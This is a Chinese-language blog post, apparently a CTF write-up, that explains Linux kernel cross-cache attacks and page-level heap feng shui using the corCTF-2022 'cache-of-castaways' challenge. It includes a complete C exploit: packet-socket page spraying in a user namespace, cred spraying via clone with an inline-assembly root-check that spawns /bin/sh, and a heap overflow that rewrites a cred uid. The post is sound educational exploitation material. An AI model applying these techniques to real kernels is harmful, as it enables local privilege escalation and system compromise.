【KPWN】Cross-Cache Attack

2024年11月6日 · 阅读需 12 分钟

Pwner who wants to write codes.

一直没有看 cross cache，今天来看看

页级堆风水 (Page-level heap fengshui)

我们知道，linux 内核中 slub 的布局是非常难以揣摩的，每个 slub 前后是哪个 slub，或者说下一个分配到的 slub 在哪，由于内核中存在非常多的 alloc / free，我们几乎无法去预测 slub 布局。然而，通过页风水的方式，我们可以人为地制造成功率较高的可控布局。

用 Buddy System 分配页的时候，我们有一个 order 的说法。每个 order 里保存了以 $2^{order}$ 个页面为一组的双向链表，而显然这些在初始化的时候是物理连续的。对于 n-order 的 free-area，如果它为空，就会从 n+1-order 的 free-area 中拆出一半用于返回给 allocator，剩下一半放入 n-order 中。

而在页面释放时，它们同样会被放入对应的 free-area 上（FIFO）。此时，如果存在物理连续的 n-order buddies，也会被合并，再放入到 n+1-order 的 free-area 上。

具体可以参考 a3 的 https://arttnba3.cn/2022/06/30/OS-0X03-LINUX-KERNEL-MEMORY-5.11-PART-II

那么我们不难想到这样一件事，以 order-0 举例，假如 order-0 为空，下次 allocator 需要 1 页的时候，就会从 order-1 中拿取一组界面，也就是 $2^1=2$ 页回来，一个返回给 allocator，一个用于补充 free_area[0]，这两个页显然是物理连续的。

那么如果是 vuln slub 拿到了第一个界面，紧接着 victim slub 拿到了第二个页，那么我们自然就造出了可控的页布局，也就是完成了所谓的页风水。

注意

然而，这种方式并不稳定，只能说尽可能地增加了成功率。

这是因为 kernel 大量的使用了 order-0 的界面，而没有 ACCOUNT 标志的 slub 往往会被重用，因此就算我们能够控制 vuln slub 和 victim slub 的页面物理相邻，我们仍然无法确保 vuln obj 和 victim obj 是物理相邻的 —— 即 vuln obj 位于 vuln slub 末尾，victom obj 位于 victim slub 开头。

因此，在 real CVE 中，一般页风水被用在非 order-0 的攻击原语中。

Cross Cache

Cross Cache，在我们完成页风水后，显然容易理解了 —— 就是通过溢出 vuln obj 这个 kmem_cache 来影响 victim slub 中的 victim obj 的攻击手法。

非常推荐阅读笑尘的 CVE-2022-27666: Exploit esp6 modules in Linux kernel - ETenal，他用（尽管不是那么）精美（但是）浅显易懂的 PPT 做了动画，解释了整个 Cross Cache 的过程。

理想情况

在没有任何噪声的情况下，我们可以设想如下攻击模型

for x in range(0x200):
    alloc_page()  # 用尽 low-order pages
for x in range(1, 0x200, 2):
    free_page(x)  # 释放奇数页，确保不会形成 buddies 从而合并到 high-order
spray_victim_obj()  # 堆喷 victim obj
for x in range(0, 0x200, 2):
    free_page(x)  # 释放偶数页，同上
spray_vulnerable_obj()  # 堆喷 vuln obj
overflow_vulnerable_obj()  # 堆溢出，自然会有位于 `vuln slub` 末尾的 obj 溢出到位于 `victim slub` 头的 obj

然而，假设有噪声，i.e. 内核自己的结构体拿了我们刚释放的页，或是又多了新的页放入到 low-order area 中，亦或是因为 slub alias 导致 victim slub 头不再是 victim obj。我们的攻击就有可能失败。

corCTF-2022 cache-of-castaways

这大概是少有的 cross cache 的 CTF 题目。对于实战，你可以参阅 CVE-2022-29582 - Computer security and related topics CVE-2022-27666: Exploit esp6 modules in Linux kernel - ETenal 或是 Project Zero: Exploiting the Linux kernel via packet sockets

题目附件可以在这里下载：corCTF-2022-public-challenge-archive/pwn/cache-of-castaways at master · Crusaders-of-Rust/corCTF-2022-public-challenge-archive

题目本身非常简单，提供了 add 和 edit 的功能，存在 6bytes 的溢出。其中，这个溢出的 cache 是 SLAB_ACCOUNT 标志位的，因此它占用一个独立的 slub。

而溢出 6bytes，显然也支持我们将 cred 的 UID 写为 0。恰巧 cred_jar 显然也在 ACCOUNT 的独立 slub 里，因此我们其实能够排除一部分噪声。

那么接下来，我们就顺着理想情况一步一步来分析即可。首先是 alloc_page，在 CVE-2017-7308 中 project zero 提出了一个非常优雅的页喷射原语：setsockopt()。

Project Zero: Exploiting the Linux kernel via packet sockets

在设置完成后，它会调用 alloc_pg_vec()，在这个函数里，它会分配 tp_block_nr 次 2^order 个页面（其中 order 是由 tp_block_size 决定的），而在关闭 fd 后，这些页面也会被释放。只不过低权限用户在 root namespaces 下没有办法调用这个函数，必须要换一个命名空间，此时，我们可以使用 pipe 进行通信。

#include "kernel.h"

#define INITIAL_PAGE_SPRAY 1000
#define CRED_JAR_SPARY 512
#define SIZE 0x1000
#define PAGENUM 1

int sprayfd_child[2], sprayfd_parent[2];
int socketfds[INITIAL_PAGE_SPRAY];

enum spraypage_cmd {
    ALLOC,
    FREE,
    QUIT
};

struct ipc_req_t {
    enum spraypage_cmd cmd;
    int idx;
};

void spraypage_send(enum spraypage_cmd cmd, int idx) {
    struct ipc_req_t req;
    req.cmd = cmd;
    req.idx = idx;
    write(sprayfd_child[1], &req, sizeof(req));
    read(sprayfd_parent[0], &req, sizeof(req));  // just for synchornization
}

void spray_pages() {
    struct ipc_req_t req;
    do {
        read(sprayfd_child[0], &req, sizeof(req));
        switch (req.cmd) {
            case ALLOC:
                socketfds[req.idx] = alloc_pages_via_sock(SIZE, req.idx);
                break;
            case FREE:
                close(socketfds[req.idx]);
                break;
            case QUIT:
                break;
            default:
                assert(0);
        }
        write(sprayfd_parent[1], &req, sizeof(req));
    }
    while (req.cmd != QUIT);
}

int main() {

    bind_cpu(0);
    int fd = open("/dev/castaway", O_RDWR);
    if (fd < 0) {
        printf("Error opening device\n");
        return 1;
    }

    pipe(sprayfd_child);
    pipe(sprayfd_parent);

    if (!fork()) {
        unshare_setup(getuid(), getgid());
        spray_pages();
    }

    for (int i = 0; i < INITIAL_PAGE_SPRAY; i++) {
        spraypage_send(ALLOC, i);
    }
}

我们使用 fork 开了一个子进程，然后将子进程放到单独的命名空间里，并且用管道进行通信。

这两个函数定义如下

void unshare_setup(uid_t uid, gid_t gid)
{
    int temp;
    char edit[0x100];
    unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET);
    
    temp = open("/proc/self/setgroups", O_WRONLY);
    write(temp, "deny", strlen("deny"));
    close(temp);

    temp = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", uid);
    write(temp, edit, strlen(edit));
    close(temp);
    
    temp = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", gid);
    write(temp, edit, strlen(edit));
    close(temp);
    return;
}

int alloc_pages_via_sock(uint32_t size, uint32_t n)
{
    struct tpacket_req req;
    int32_t socketfd, version;

    socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socketfd < 0)
    {
        perror("bad socket");
        exit(-1);
    }

    version = TPACKET_V1;

    if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0)
    {
        perror("setsockopt PACKET_VERSION failed");
        exit(-1);
    }

    assert(size % 4096 == 0);

    memset(&req, 0, sizeof(req));

    req.tp_block_size = size;
    req.tp_block_nr = n;
    req.tp_frame_size = 4096;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
    {
        perror("setsockopt PACKET_TX_RING failed");
        exit(-1);
    }

    return socketfd;
}

接下来进行第二步，释放奇数页，然后喷 cred。

但是我们需要注意噪声问题。fork 会引入大量噪声，因此，我们可以只通过 clone 系统调用，从而减少噪声。使用 CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND 作为 FLAG，这样每一次就只会有 4 个 order-0 的分配，对于后面的操作，我们也尽可能只使用汇编，尽量减少噪声。

在这里，我们将每一个 clone 引到 check_and_wait 函数里，它在 rootfd 接到消息后就检查是不是 root，如果不是就进入睡眠。

#define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

int rootfd[2];
struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0};
char throwaway;
char root[] = "root\n";
char binsh[] = "/bin/sh\x00";
char *args[] = {"/bin/sh", NULL};

__attribute__((naked)) void check_and_wait()
{
    asm(
        "lea rax, [rootfd];"
        "mov edi, dword ptr [rax];"
        "lea rsi, [throwaway];"
        "mov rdx, 1;"
        "xor rax, rax;"
        "syscall;"
        "mov rax, 102;"
        "syscall;"
        "cmp rax, 0;"
        "jne finish;"
        "mov rdi, 1;"
        "lea rsi, [root];"
        "mov rdx, 5;"
        "mov rax, 1;"
        "syscall;"
        "lea rdi, [binsh];"
        "lea rsi, [args];"
        "xor rdx, rdx;"
        "mov rax, 59;"
        "syscall;"
        "finish:"
        "lea rdi, [timer];"
        "xor rsi, rsi;"
        "mov rax, 35;"
        "syscall;"
        "ret;");
}

int main() {

    bind_cpu(0);
    int fd = open("/dev/castaway", O_RDWR);
    if (fd < 0) {
        printf("Error opening device\n");
        return 1;
    }

    pipe(sprayfd_child);
    pipe(sprayfd_parent);
    pipe(rootfd);

    for (int i = 0; i < CRED_JAR_SPARY; i++) {
        pid_t pid = fork();
        if (!pid) {
            sleep(10000);
        }
        else if (pid < 0) {
            errExit("fork");
        }
    }

    if (!fork()) {
        unshare_setup(getuid(), getgid());
        spray_pages();
    }

    for (int i = 0; i < INITIAL_PAGE_SPRAY; i++) {
        spraypage_send(ALLOC, i);
    }

    puts("\033[32m[*] Initial pages sprayed\033[0m");
    puts("\033[32m[+] Start to free odd pages\033[0m");

    for (int i = 1; i < INITIAL_PAGE_SPRAY; i += 2) {
        spraypage_send(FREE, i);
    }

    puts("\033[32m[+] Start to spray creds\033[0m");
    for (int i = 0; i < FORK_SPRAY; i++) 
        pid_t pid = __clone(CLONE_FLAGS, &check_and_wait);
}

既然 victim obj 已经喷完了，那么就开始继续释放偶数页面，然后喷 vuln obj 了。喷完之后，我们设置 uid 位为 1，成功拿到了 rootshell

最终 exp：

#include "kernel.h"

#define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

#define INITIAL_PAGE_SPRAY 1000
#define VULN_SPRAY 400
#define CRED_JAR_SPARY 512
#define SIZE 0x1000
#define PAGENUM 1

int fd;
int sprayfd_child[2], sprayfd_parent[2];
int rootfd[2];
int socketfds[INITIAL_PAGE_SPRAY];

enum spraypage_cmd {
    ALLOC,
    FREE,
    QUIT
};

struct ipc_req_t {
    enum spraypage_cmd cmd;
    int idx;
};

struct castaway_request {
    int64_t index;
    size_t	size;
    void 	*buf;
};

struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0};
char throwaway;
char root[] = "root\n";
char binsh[] = "/bin/sh\x00";
char *args[] = {"/bin/sh", NULL};

void edit(int64_t index, size_t size, void *buf)
{
    struct castaway_request r = {
        .index = index,
        .size = size,
        .buf = buf,
    };

    ioctl(fd, 0xF00DBABE, &r);
}


__attribute__((naked)) void check_and_wait()
{
    asm(
        "lea rax, [rootfd];"
        "mov edi, dword ptr [rax];"
        "lea rsi, [throwaway];"
        "mov rdx, 1;"
        "xor rax, rax;"
        "syscall;"
        "mov rax, 102;"
        "syscall;"
        "cmp rax, 0;"
        "jne finish;"
        "mov rdi, 1;"
        "lea rsi, [root];"
        "mov rdx, 5;"
        "mov rax, 1;"
        "syscall;"
        "lea rdi, [binsh];"
        "lea rsi, [args];"
        "xor rdx, rdx;"
        "mov rax, 59;"
        "syscall;"
        "finish:"
        "lea rdi, [timer];"
        "xor rsi, rsi;"
        "mov rax, 35;"
        "syscall;"
        "ret;");
}

void spraypage_send(enum spraypage_cmd cmd, int idx) {
    struct ipc_req_t req;
    req.cmd = cmd;
    req.idx = idx;
    write(sprayfd_child[1], &req, sizeof(req));
    read(sprayfd_parent[0], &req, sizeof(req));
}

void spray_pages() {
    struct ipc_req_t req;
    do {
        read(sprayfd_child[0], &req, sizeof(req));
        switch (req.cmd) {
            case ALLOC:
                socketfds[req.idx] = alloc_pages_via_sock(SIZE, req.idx);
                break;
            case FREE:
                close(socketfds[req.idx]);
                break;
            case QUIT:
                break;
            default:
                assert(0);
        }
        write(sprayfd_parent[1], &req.idx, sizeof(req.idx));
    }
    while (req.cmd != QUIT);
}

int main() {

    bind_cpu(0);
    fd = open("/dev/castaway", O_RDWR);
    if (fd < 0) {
        printf("Error opening device\n");
        return 1;
    }

    pipe(sprayfd_child);
    pipe(sprayfd_parent);
    pipe(rootfd);

    char data[0x200];;
    memset(data, 0, sizeof(data));

    puts("\033[32m[+] Start to spray pages\033[0m");
    if (!fork()) {
        unshare_setup(getuid(), getgid());
        spray_pages();
    }

    for (int i = 0; i < INITIAL_PAGE_SPRAY; i++) {
        spraypage_send(ALLOC, i);
    }

    puts("\033[32m[*] Initial pages sprayed\033[0m");
    puts("\033[32m[+] Start to free odd pages\033[0m");

    for (int i = 1; i < INITIAL_PAGE_SPRAY; i += 2) {
        spraypage_send(FREE, i);
    }

    puts("\033[32m[+] Start to spray creds\033[0m");
    printf("%p\n", &check_and_wait);
    for (int i = 0; i < CRED_JAR_SPARY; i++) {
        pid_t pid = __clone(CLONE_FLAGS, &check_and_wait);
        if (pid < 0) {
            errExit("clone");
        }
    }

    puts("\033[32m[+] Start to spray vulnerabilities\033[0m");
    for (int i = 0; i < INITIAL_PAGE_SPRAY; i += 2) {
        spraypage_send(FREE, i);
    }

    *(uint32_t *)(&data[0x200-6]) = 1;
    for (int i = 0; i < VULN_SPRAY; i++) {
        ioctl(fd, 0xcafebabe);
        edit(i, 0x200, data);
    }

    puts("\033[32m[+] Let's roll\033[0m");

    write(rootfd[1], data, sizeof(data));
    sleep(1000000000);
}

注意它仍然有概率失败。

现在，让我们来看一看这些数字的选择：

INITIAL_PAGE_SPRAY：我们喷了 1000 个页面，这显然有助于我们耗尽 low-order 页面，拆出 high-order 页面。注意，这里我们首先肯定也会先把 low-order 的页面放入 low-order 的 free-area 里，然后才会把奇数的页面放入。
CRED_JAR_SPRAY: 我们喷了 512 个。一个 cred_jar 是 32 个 slub，这就相当于 0x10 个页面，其实很少，可以多喷一些，不过由于我们 VULN_SPRAY 被限定了 400 个，也就是 50 个页，所以其实太大也没用，够不到了。
VULN_SPRAY: 给 400 个我们就喷 400 个吧

信息

如果考虑优化，我们还能进一步提升命中率

在 PAGE 这里，我们可以确保 free 的 page 都是 Contiguous Pages —— 即所有我们用来分配 vuln 和 victim 的 slub page 都是从 high-order 拆出来的。

想要做到这样，我们首先耗尽 low-order pages，紧接着只需要在释放页面的时候确保是 Contiguous Page 即可，也就是说，我们可以增加一个常量 DRAIN_PAGES，用于存放不连续的页面，然后在他之后的 PAGE_SPRAY 个页面，我们认为是连续的，并且进行释放和重用。

然而实际尝试之后，我发现命中率并没有提升，甚至大幅度下降了。我猜测应该是内核噪声占用了这些 slub 的原因？

页级堆风水 (Page-level heap fengshui)​

Cross Cache​

理想情况​

corCTF-2022 cache-of-castaways​

页级堆风水 (Page-level heap fengshui)

Cross Cache

理想情况

corCTF-2022 cache-of-castaways